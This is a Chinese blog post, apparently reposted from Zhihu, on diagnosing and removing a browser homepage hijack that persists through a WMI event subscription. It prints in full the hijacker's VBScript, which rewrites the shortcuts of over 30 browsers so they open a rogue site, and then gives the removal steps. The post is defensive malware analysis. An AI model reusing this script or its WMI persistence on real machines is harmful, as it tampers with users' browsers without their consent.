瀏覽器劫持處理

百度這公司完全沒有節操，玩小手段溜溜的，玩電腦的99%都被hao123劫持過，隨便在網上下點什么破解的東西就可能中招

一個破導航站有必要這么推么。。。

常規方案就是看 計划任務、注冊表 網上一大把全是這樣的

現在講個非常規的，找了很久才找到的，

轉載自：https://www.zhihu.com/question/21883209

知乎也惡心，內容不讓復制，

解決辦法：chrome/360瀏覽器 F12打開前端調試工具 → F1打開調試工具幫助 → 選中Disable JavaScript

 

主頁被劫持的原理是一段通過WMI發起的定時自動運行腳本，WMI（Windows Management Instrumentation）可以理解成Windows系統后台運行的一個事件管理器。為查看WMI事件，先去下載WMITools並安裝：WMI工具

之后打開WMI Event Viewer：

點擊左上角的筆的圖標（Register For Events），在彈出的Connect to namespace的框直接點OK，Login的頁面也直接點OK。點開左側欄的EventFilter，再點擊下級目錄的項目：

在右側欄右鍵點擊ActiveScriptEventConsumer，並通過view instant properties查看屬性：

在Script Text那一欄我們可以看到這段腳本：

On Error Resume Next

Const link = "http://hao.qquu8.com/?m=yx&r=j"
Const link360 = "http://hao.qquu8.com/?m=yx&r=j&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\sjtul\Desktop,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\sjtul\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next
lnkpathsArr = split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
    If fso.FolderExists(oFolder) Then
        For Each file In fso.GetFolder(oFolder).Files
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                Set oShellLink = WshShell.CreateShortcut(file.Path)
                path = oShellLink.TargetPath
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                If oDic.Exists(LCase(name)) Then
                    If LCase(name) = LCase("360se.exe") Then
                        oDicShellLink.Arguments = link360
                    Else
                        oShellLink.Arguments = link
                    End If
                    If file.Attributes And 1 Then
                        fsoile.Attributes = file.Attributes - 1
                    End If
                    oShellLink.Save
                End If
            End If
        Next
    End If
Next

終於抓到了幕后黑手。可以看到這是一段VBScript代碼，攻擊目標涵蓋了包括Chrome、360、Firefox、搜狗等30余種常見的瀏覽器。腳本以瀏覽器的安裝地址為切入點，創建WshShell對象，進而生成植入了流氓網站的快捷方式。360瀏覽器有限定主頁格式，於是這段腳本還特地修飾了流氓網站的鏈接。唉，流氓至此，也是服了。

查到了源頭如何清清除這段造孽的腳本呢？直接在WMI Event Viewer中將_EventFilter.Name="VBScriptKids_filter"右鍵刪掉會被系統拒絕掉，需要去WMI Event Viewer的安裝位置，右鍵以管理員方式運行exe文件才能刪掉。之后還要把各個快捷方式都改回不帶流氓網站的版本，包括桌面上的、開始菜單里的以及快速訪問欄里的快捷方式，其中開始菜單里的快捷方式要去C:\ProgramData\Microsoft\Windows\Start Menu\Programs里改掉。唉，一趟下來真是讓人心累，好在最終瀏覽器擺脫了流氓網站的劫持：

 

 

---恢復內容結束---